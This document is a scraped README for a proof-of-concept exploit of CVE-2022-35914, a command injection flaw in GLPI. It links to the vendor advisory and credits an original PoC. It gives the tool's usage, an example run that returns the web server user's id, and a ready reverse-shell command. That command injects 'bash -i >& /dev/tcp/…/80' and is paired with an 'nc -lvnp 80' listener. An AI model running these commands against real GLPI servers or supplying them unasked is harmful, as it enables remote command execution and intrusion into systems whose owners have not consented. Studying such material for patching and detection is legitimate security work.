Share
## https://sploitus.com/exploit?id=DDB51774-BB1C-5B7A-BF0D-E66C16791D33
# CVE-2022-35914 PoC

## References

- https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
- https://github.com/cosad3s/CVE-2022-35914-poc (Credit to Sébastien Copin for the PoC I adapted here)


Check out my full writeup here: https://link.medium.com/tBwDlpQl3Ib 

## Usage

```bash
pip install -r requirements.txt
```

```
python3 CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL [-c CMD] [-f HOOK] [-b CALLBACK] [--check] [--user-agent USER_AGENT]

CVE-2022-35914 - GLPI - Command injection using a third-party library script

options:
  -h, --help            show this help message and exit
  -u URL                URL to test
  -c CMD                Command to launch (default: id)
  -f HOOK               PHP hook function (default: array_map)
  -b CALLBACK           PHP callback function (default: system)
  --check               Just check, no command execution.
  --user-agent USER_AGENT
                        Custom User-Agent
```

Example:
```bash
python3 CVE-2022-35914.py -u http://glpi

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Revshell:
```bash
python3 CVE-2022-35914.py -u http://192.168.249.242 -c 'bash -c "bash -i >& /dev/tcp/192.168.45.154/80 0>&1"'

nc -lvnp 80
```